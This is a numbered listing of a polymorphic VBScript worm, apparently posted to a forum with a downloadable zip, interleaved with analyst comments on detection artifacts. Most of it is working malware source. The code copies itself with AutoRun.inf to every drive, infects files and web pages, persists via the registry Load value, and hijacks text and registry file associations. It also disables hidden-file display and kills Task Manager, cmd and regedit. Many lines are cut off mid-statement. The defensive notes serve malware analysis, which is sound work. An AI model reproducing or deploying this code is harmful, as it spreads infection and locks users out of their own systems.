538 Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
Wscript.Quit
539
Case Else
540 vbsCode = GetSelfCode(objfso, FullPath_Self)
541 MainBody = GetMainBody(vbsCode, Sum_ModelCode)
542 VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody
543 VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
544
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBod
545 VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
546 VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
547 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody
548 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
549
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
550
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
551
552 Call InvadeSystem(objfso, VbsCode_Virus)
553 Call MonitorSystem(objfso, VbsCode_Virus)
554 End Select
Else
555 vbsCode = GetSelfCode(objfso, FullPath_Self)
556 MainBody = GetMainBody(vbsCode, Sum_ModelCode)
557 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF
558
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺
559
560 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称
561 Call MonitorSystem(objfso, VbsCode_Virus)
562 End If
563 End Select
564 Set objfso = Nothing
565 Set objshell = Nothing
566 End Sub
567 'WQKAULMNKKG1_3
568 'HJLMRRQRWYOZX1_1
569 On Error Resume Next
570 Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelC
571 Dim ModelHead, ModelTail
572 Cnt = 0
CntMax = 1000
573 Version = "4"
574 Name_V1 = GetUserName() & ".vbs"
575 FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
576 FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
577 FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
578 Sum_ModelCode = 26
579 Head_V= GetHeadTail(0)
580 Tail_V= GetHeadTail(1)
ModelHead="'HJLMRRQRWYOZX"
581
ModelTail="'WQKAULMNKKG"
582
Call VirusMain()
583
Sub VirusMain()
584
On Error Resume Next
585
Call ExeVbs_Virus()
586
End Sub
587 'WQKAULMNKKG1_1
588 'HJLMRRQRWYOZX2_19
589 Function GetVersion(objfso, path_v)
590 Dim FV, buffer
591 Set FV = objfso.OpenTextFile(path_v, 1)
592 buffer = FV.ReadAll()
593 GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
594 End Function
595 Function GetScriptCode(Languages)
596 On Error Resume Next
597 Dim soj
598 For Each soj In document.Scripts
599 If LCase(soj.Language) = Languages Then
600 Select Case LCase(soj.Language)
601 Case "vbscript"
602 GetScriptCode = soj.Text
603 Exit Function
604 Case "javascript"
605 GetScriptCode = soj.Text
606 Exit Function
607 End Select
608 End If
609 Next
610 End Function
' Reads the file at FullPath_Self and returns the text from the first occurrence of
' Head_V through the last occurrence of Tail_V (plus one character).
' Analysis note: this is how the script isolates its own body inside a host file, which
' confirms that the head and tail markers delimit the full embedded code block.
611 Function GetSelfCode(objfso, FullPath_Self)
612 On Error Resume Next
613 Dim n, n1, buffer, Self
614 Set Self = objfso.OpenTextFile(FullPath_Self, 1)
615 buffer = Self.ReadAll
n = InStr(buffer, Head_V)
616 n1 = InstrRev(buffer, Tail_V)
617 buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
618 GetSelfCode = buffer
619 Self.Close
620 End Function
621 Function GetMainBody(vbsCode, Sum_ModelCode)
622 Dim i
623 For i = 2 To Sum_ModelCode
624 GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
625 Next
626 End Function
'WQKAULMNKKG2_19
627 'HJLMRRQRWYOZX2_13
' Writes three REG_DWORD values: 129 under an HKCU "...\Policies..." path and 0 under
' an HKCU and an HKLM "...\Explorer..." path. Called at the end of InvadeSystem.
' Listing note: all three registry paths are cut off at the right edge, so the exact
' value names are not visible. NOTE(review): the names and values look like Explorer
' hidden-file display settings and an AutoRun drive-type policy -- confirm against the
' attachment before using them as indicators.
' SafeSet writes 1 to the corresponding Explorer values as the reverse operation.
628 Sub DeSafeSet()
629
Dim HLMShow , HCUAdvanced, HCUExplorer
630 HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ad
631 HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
632 HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
633 Call WriteReg (HCUExplorer, 129, "REG_DWORD")
634 Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
635 Call WriteReg (HLMShow, 0, "REG_DWORD")
636 End Sub
' Reverse of DeSafeSet for the Explorer settings: writes REG_DWORD 1 to three values
' under "...\CurrentVersion\Explorer..." (two HKCU, one HKLM). Called by RestoreSystem.
' Listing note: the registry paths are cut off at the right edge. Unlike DeSafeSet,
' nothing is written to the "...\Policies..." path here, so the value DeSafeSet set to
' 129 is left in place by the sample's own uninstall and has to be reviewed manually.
637 Sub SafeSet()
638 Dim HLMShow , HCUSSHidden, HCUHidden
639 Dim HCUExplorer
640 HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ad
641 HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\A
642
Call WriteReg (HCUHidden, 1, "REG_DWORD")
643
644 Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
645 Call WriteReg (HLMShow, 1, "REG_DWORD")
646 End Sub
'WQKAULMNKKG2_13
647 'HJLMRRQRWYOZX2_23
648 Function MakeScript(strCode, T)
649 If T = 1 Then
650
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(str
651 Else
652 MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "
653 End If
654 End Function
655 'WQKAULMNKKG2_23
656 'HJLMRRQRWYOZX1_6
' Places a copy of the script (Name_V1) and an AutoRun.inf in the root of drive D.
' Existing files with those names are deleted first; both new files are then given
' the attribute value set by SetFileAttr. The AutoRun.inf text launches
' "WScript.exe <Name_V1>" through Shellexecute and shell\AutoRun\command entries.
' Listing note: the condition on the outer If and part of the inf text are cut off at
' the right edge.
' Detection / mitigation: a hidden AutoRun.inf in a drive root that references
' WScript.exe together with a .vbs file beside it is the artifact to look for on
' removable and shared drives; having AutoRun disabled for such media removes the
' automatic launch this file relies on.
657 Sub AutoRun(objfso, D, vbsCode)
658 On Error Resume Next
659 Dim path_autorun, path_vbs, inf_autorun
660 path_autorun = D & ":\AutoRun.inf"
661 path_vbs = D & ":\" & Name_V1
662 If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or
663 If objfso.FileExists(path_autorun) = True Then
objfso.DeleteFile path_autorun, True
664
665 End If
666 If objfso.FileExists(path_vbs) = True Then
objfso.DeleteFile path_vbs, True
667 End If
668 Call CopyFile(objfso, vbsCode, path_vbs)
669 Call SetFileAttr(objfso, path_vbs)
670 inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " "
671 & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\Auto
672 ""AutoRun"""
673 Call CopyFile(objfso, inf_autorun, path_autorun)
674 Call SetFileAttr(objfso, path_autorun)
675 End If
676 End Sub
677 'WQKAULMNKKG1_6
678 'HJLMRRQRWYOZX2_14
' Reads the config file FullPath_OK and returns up to 50 characters following the
' text "Order:", right-trimmed. ExeVbs_Virus splits the result at "@" into an order
' name and a parameter.
679 Function ReadOK(objfso, FullPath_OK)
680 On Error Resume Next
681 Dim vf, buffer
682 Set vf = objfso.OpenTextFile(FullPath_OK, 1)
683 buffer = vf.ReadAll
684 ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
685 End Function
' Recreates the config file FullPath_OK with three lines:
'   OK
'   <current date>
'   Order:<Order_Order>@<Order_Para>
' and then applies SetFileAttr to it.
' Analysis note: a small hidden .ini file in the System folder with exactly this
' three-line layout is a host artifact of the sample (the file name comes from
' GetUserName() & ".ini").
686 Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
687 On Error Resume Next
688 Dim vf1
689 objfso.DeleteFile FullPath_OK, True
690 Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
691 vf1.Write "OK" & VBCRLF
vf1.WriteLine Date()
692
vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
693
Call SetFileAttr(objfso, FullPath_OK)
694
End Sub
695
'WQKAULMNKKG2_14
696 'HJLMRRQRWYOZX2_24
' For each name in ProcessNames, queries Win32_Process over WMI and calls Terminate on
' every match. When Terminate returns 2, it falls back to running
' "cmd.exe /c @tskill <name without extension>" in a hidden window.
' Listing note: the WQL query string is cut off at the right edge.
' Analysis note: MonitorSystem calls this every five seconds with a list that includes
' Task Manager, cmd and regedit, which is why those tools appear to close immediately on
' an affected host. Detection: WScript.exe spawning cmd.exe with tskill, or repeated
' Win32_Process Terminate calls from a script host.
697 Sub KillProcess(ProcessNames)
698 On Error Resume Next
699 Dim objShell, intReturn, name_exe
700 Set objShell = WScript.CreateObject("WScript.Shell")
701 strComputer = "."
702 Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
703 For Each ProcessName in ProcessNames
704 Set colProcessList = objWMIServices.Execquery(" Select * From win32_process whe
705 For Each objProcess in colProcessList
706 intReturn = objProcess.Terminate
707 Select Case intReturn
708 Case 2
709 name_exe = objProcess.Name
710 name_exe = Left(name_exe, Len(name_exe) -4)
711 objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
712 End Select
713 Next
714 Next
715 Set objShell = Nothing
716 End Sub
'WQKAULMNKKG2_24
717 'HJLMRRQRWYOZX1_7
' Installation / persistence routine. In order, as visible below:
'   1. For every drive of type 1, 2 or 3, call AutoRun to place the script copy and
'      AutoRun.inf in the drive root.
'   2. Write the script to FullPath_V1 and FullPath_V0 (replacing an existing copy when
'      a version comparison holds; the comparison is cut off at the right edge) and
'      apply SetFileAttr to both.
'   3. Point the HKCU "...\Windows NT\CurrentVersion\Windows\L..." value at FullPath_V1
'      (path truncated in this listing; presumably the "Load" value -- confirm).
'   4. Redirect the txtfile, regfile, chm.file and hlpfile open commands to
'      WScript.exe running FullPath_V0.
'   5. Call DeSafeSet().
' Response note: this routine is re-run every five seconds by MonitorSystem, so each
' of the items above is restored while the script process is alive. The same list is
' the set of host artifacts to verify after cleanup.
718 Sub InvadeSystem(objfso, vbsCode)
719 On Error Resume Next
720 Dim Value, HCULoad, vbsCode_Virus, dc, d
721
Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
722 HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\L
723 vbsCode_Virus = vbsCode
724 Set dc = objfso.Drives
725 For Each d In dc
726 If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
727 Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
728 End If
729 Next
730 If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Versio
731 objfso.DeleteFile FullPath_V1 , True
732 Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
733 Call SetFileAttr(objfso, FullPath_V1)
734 Else
735 Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
736 Call SetFileAttr(objfso, FullPath_V1)
737 End If
738 If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version
739 objfso.DeleteFile FullPath_V0 , True
740 Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
741 Call SetFileAttr(objfso, FullPath_V0)
Else
742
743 Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
744 Call SetFileAttr(objfso, FullPath_V0)
745 End If
746 If ReadReg(HCULoad)<> FullPath_V1 Then
747 Call WriteReg (HCULoad, FullPath_V1, "")
748 End If
749 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Valu
750 Call SetTxtFileAss(FullPath_V0)
751 End If
752 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Valu
753 Call SetRegFileAss(FullPath_V0)
754 End If
755 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Val
756 Call SetchmFileAss(FullPath_V0)
757 End If
758 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Valu
759 Call SethlpFileAss(FullPath_V0)
760 End If
761 Call DeSafeSet()
762 End Sub
763 'WQKAULMNKKG1_7
764 'HJLMRRQRWYOZX2_15
' Sets the attributes of the file at pathf to 6, which in the FileSystemObject
' attribute flags is Hidden (2) + System (4).
' Analysis note: the dropped .vbs, .ini and AutoRun.inf files are therefore not shown
' by Explorer's default view; enumerate with hidden and system files included when
' checking drive roots and the Windows/System folders.
765 Sub SetFileAttr(objfso, pathf)
766 Dim vf
767 Set vf = objfso.GetFile(pathf)
768 vf.Attributes = 6
769 End Sub
'WQKAULMNKKG2_15
770 'HJLMRRQRWYOZX2_18
' Reads the first three lines of the config file path_f and decides whether today's
' run has already been done.
'   - True when line 1 is "OK" and line 2 equals Now_V (case-insensitive compare);
'     ExeVbs_Virus passes Date() as Now_V and skips the order handling on True.
'   - When line 3 is exactly "Admin", a message box and an input prompt are shown
'     (the prompt text offers 0: quit, 1: monitor system, 2: infect files) and the
'     return value follows the answer. This is a manual test switch left in by the
'     author, not part of the normal config format that WriteOK produces
'     (where line 3 starts with "Order:").
771 Function IsOK(objfso, Now_V, path_f)
772 On Error Resume Next
773
Dim vf, p1, p2, p3
774 IsOK = False
775 Set vf = objfso.OpenTextFile(path_f, 1)
776 p1 = Trim(vf.ReadLine)
777 p2 = Trim(vf.ReadLine)
778 p3 = Trim(vf.ReadLine)
779 If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
IsOK = True
780
End If
781
782 If p3 = "Admin" Then
MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
783 IsOK = True
784 n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!")
785
If n = 0 Then
786 Wscript.Quit
787 ElseIf n = 1 Then
788 IsOK = True
789 ElseIf n = 2 Then
790 IsOK = False
791 End If
792 End If
793 End Function
794 'WQKAULMNKKG2_18
795 'rotartsinimdA
Attached Files
 DNAOrder.zip 6.32KB 376 downloads

 Back to top